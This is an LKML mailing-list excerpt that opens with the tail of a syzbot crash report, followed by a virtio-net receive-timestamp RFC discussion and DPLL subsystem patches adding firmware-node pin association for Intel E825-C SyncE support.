do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f08c359acb9 Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f08c446a028 EFLAGS: 00000246 ORIG_RAX: 0000000000000013 RAX: ffffffffffffffda RBX: 00007f08c3815fa0 RCX: 00007f08c359acb9 RDX: 0000000000000002 RSI: 0000200000000080 RDI: 0000000000000003 RBP: 00007f08c3608bf7 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f08c3816038 R14: 00007f08c3815fa0 R15: 00007fff6491da78 </TASK> ---------------- Code disassembly (best guess): 0: 90 nop 1: 90 nop 2: 90 nop 3: 90 nop 4: 90 nop 5: 90 nop 6: 90 nop 7: 90 nop 8: 90 nop 9: 90 nop a: 90 nop b: 90 nop c: 90 nop d: 90 nop e: f3 0f 1e fa endbr64 12: 55 push %rbp 13: 53 push %rbx 14: 48 89 f3 mov %rsi,%rbx 17: 89 fd mov %edi,%ebp 19: e8 60 b1 c4 ff call 0xffc4b17e 1e: 48 8d 3d 39 25 d5 0d lea 0xdd52539(%rip),%rdi # 0xdd5255e 25: 89 ee mov %ebp,%esi 27: 48 89 da mov %rbx,%rdx * 2a: 67 48 0f b9 3a ud1 (%edx),%rdi <-- trapping instruction 2f: 5b pop %rbx 30: 5d pop %rbp 31: c3 ret 32: cc int3 33: cc int3 34: cc int3 35: cc int3 36: cc int3 37: cc int3 38: cc int3 39: cc int3 3a: cc int3 3b: cc int3 3c: cc int3 3d: cc int3 3e: 90 nop 3f: 90 nop *** If these findings have caused you to resend the series or submit a separate fix, please add the following tag to your commit message: Tested-by: syzbot@syzkaller.appspotmail.com --- This report is generated by a bot. It may contain errors. syzbot ci engineers can be reached at syzkaller@googlegroups.com.
{ "author": "syzbot ci <syzbot+ci99a227ab2089b0fa@syzkaller.appspotmail.com>", "date": "Thu, 29 Jan 2026 05:27:03 -0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Steffen Trumtrar wrote: Good to see this picked up. I would also still like to see support in virtio-net for HW timestamps pass-through for virtio-net.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:00:07 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Steffen Trumtrar wrote: This patch refers to a struct that does not exist yet, so this cannot compile?
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:00:49 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Steffen Trumtrar wrote: Jason, Michael: creating a new struct for every field is not very elegant. Is it time to find a more forward looking approach to expanding with new fields? Like a TLV, or how netlink structs like tcp_info are extended with support for legacy users that only use a truncated struct? It's fine to implement filters, but also fine to only support ALL or NONE for simplicity. In the end it probably depends on what the underlying physical device supports. Why the multiple fields, rather than u64. More broadly: can my old patchset be dusted off as is. Does it require significant changes? I only paused it at the time, because I did not have a real device back-end that was going to support it.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:05:54 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
On 2026-02-01 at 16:05 -05, Willem de Bruijn <willemdebruijn.kernel@gmail.com> wrote: Yes, this gets complicated real fast and leads to really long calls for all the nested fields. If there is a different way, I'd prefer that. Should have added a comment, but this is based on this patch c3838262b824c71c145cd3668722e99a69bc9cd9 virtio_net: fix alignment for virtio_net_hdr_v1_hash Changing alignment of header would mean it's no longer safe to cast a 2 byte aligned pointer between formats. Use two 16 bit fields to make it 2 byte aligned as previously. This is the dusted off version ;) With the flow filter it should be possible to turn the timestamps on and off during runtime. Best regards, Steffen -- Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar | Steuerwalder Str. 21 | https://www.pengutronix.de/ | 31137 Hildesheim, Germany | Phone: +49-5121-206917-0 | Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Mon, 02 Feb 2026 08:34:58 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
On Sun, Feb 01, 2026 at 04:05:54PM -0500, Willem de Bruijn wrote: I certainly wouldn't mind, though I suspect tlv is too complex as hardware implementations can't efficiently follow linked lists. I'll try to ping some hardware designers for what works well for offloads.
{ "author": "\"Michael S. Tsirkin\" <mst@redhat.com>", "date": "Mon, 2 Feb 2026 02:59:31 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Michael S. Tsirkin wrote: Great thanks. Agreed that TLV was probably the wrong suggestion. We can definitely have a required order of fields. My initial thought is as said like many user/kernel structures: where both sides agree on the basic order of the struct, and pass along the length, so that they agree only to process the min of both their supported lengths. New fields are added at the tail of the struct. See for instance getsockopt TCP_INFO.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Mon, 02 Feb 2026 12:40:36 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Extend the DPLL core to support associating a DPLL pin with a firmware node. This association is required to allow other subsystems (such as network drivers) to locate and request specific DPLL pins defined in the Device Tree or ACPI. * Add a .fwnode field to the struct dpll_pin * Introduce dpll_pin_fwnode_set() helper to allow the provider driver to associate a pin with a fwnode after the pin has been allocated * Introduce fwnode_dpll_pin_find() helper to allow consumers to search for a registered DPLL pin using its associated fwnode handle * Ensure the fwnode reference is properly released in dpll_pin_put() Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * fixed fwnode_dpll_pin_find() return value description --- drivers/dpll/dpll_core.c | 49 ++++++++++++++++++++++++++++++++++++++++ drivers/dpll/dpll_core.h | 2 ++ include/linux/dpll.h | 11 +++++++++ 3 files changed, 62 insertions(+) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 8879a72351561..f04ed7195cadd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -595,12 +596,60 @@ void dpll_pin_put(struct dpll_pin *pin) xa_destroy(&pin->parent_refs); xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); +/** + * dpll_pin_fwnode_set - set dpll pin firmware node reference + * @pin: pointer to a dpll pin + * @fwnode: firmware node handle + * + * Set firmware node handle for the given dpll pin. + */ +void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode) +{ + mutex_lock(&dpll_lock); + fwnode_handle_put(pin->fwnode); /* Drop fwnode previously set */ + pin->fwnode = fwnode_handle_get(fwnode); + mutex_unlock(&dpll_lock); +} +EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); + +/** + * fwnode_dpll_pin_find - find dpll pin by firmware node reference + * @fwnode: reference to firmware node + * + * Get existing object of a pin that is associated with given firmware node + * reference. + * + * Context: Acquires a lock (dpll_lock) + * Return: + * * valid dpll_pin pointer on success + * * NULL when no such pin exists + */ +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +{ + struct dpll_pin *pin, *ret = NULL; + unsigned long index; + + mutex_lock(&dpll_lock); + xa_for_each(&dpll_pin_xa, index, pin) { + if (pin->fwnode == fwnode) { + ret = pin; + refcount_inc(&ret->refcount); + break; + } + } + mutex_unlock(&dpll_lock); + + return ret; +} +EXPORT_SYMBOL_GPL(fwnode_dpll_pin_find); + static int __dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv, void *cookie) diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index 8ce969bbeb64e..d3e17ff0ecef0 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -42,6 +42,7 @@ struct dpll_device { * @pin_idx: index of a pin given by dev driver * @clock_id: clock_id of creator * @module: module of creator + * @fwnode: optional reference to firmware node * @dpll_refs: hold referencees to dplls pin was registered with * @parent_refs: hold references to parent pins pin was registered with * @ref_sync_pins: hold references to pins for Reference SYNC feature @@ -54,6 +55,7 @@ struct dpll_pin { u32 pin_idx; u64 clock_id; struct module *module; + struct fwnode_handle *fwnode; struct xarray dpll_refs; struct xarray parent_refs; struct xarray ref_sync_pins; diff --git a/include/linux/dpll.h b/include/linux/dpll.h index c6d0248fa5273..f2e8660e90cdf 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -16,6 +16,7 @@ struct dpll_device; struct dpll_pin; struct dpll_pin_esync; +struct fwnode_handle; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -178,6 +179,8 @@ void dpll_netdev_pin_clear(struct net_device *dev); size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); + +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -193,6 +196,12 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) { return 0; } + +static inline struct dpll_pin * +fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +{ + return NULL; +} #endif struct dpll_device * @@ -218,6 +227,8 @@ void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); + int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:30 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Associate the registered DPLL pin with its firmware node by calling dpll_pin_fwnode_set(). This links the created pin object to its corresponding DT/ACPI node in the DPLL core. Consequently, this enables consumer drivers (such as network drivers) to locate and request this specific pin using the fwnode_dpll_pin_find() helper. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 7d8ed948b9706..9eed21088adac 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1485,6 +1485,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; } + dpll_pin_fwnode_set(pin->dpll_pin, props->fwnode); if (zl3073x_dpll_is_input_pin(pin)) ops = &zl3073x_dpll_input_pin_ops; -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:31 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. 